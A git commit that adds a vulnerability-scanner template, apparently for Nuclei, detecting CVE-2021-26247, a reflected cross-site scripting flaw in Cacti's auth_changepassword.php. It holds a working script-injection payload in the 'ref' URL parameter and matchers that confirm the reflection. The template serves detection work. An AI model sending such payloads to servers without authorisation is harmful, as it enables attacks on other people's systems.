Create CVE-2021-26247.yaml

2022-02-01 11:34:51 +05:30 · 2022-02-01 11:34:51 +05:30 · bcc7113677
parent 0a715c0118
commit bcc7113677
1 changed files with 30 additions and 0 deletions
--- a/cves/2021/CVE-2021-26247.yaml
+++ b/cves/2021/CVE-2021-26247.yaml
@ -0,0 +1,30 @@
+id: CVE-2021-26247
+
+info:
+  name: Cacti URL Parameter auth_changepassword.php
+  author: dhiyaneshDK
+  severity: medium
+  description: |
+    As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26247
+  tags: cve,cve2021,cacti,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/auth_changepassword.php?ref=<script>alert(document.domain)</script>'
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'script>alert(document.domain)</script>'
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200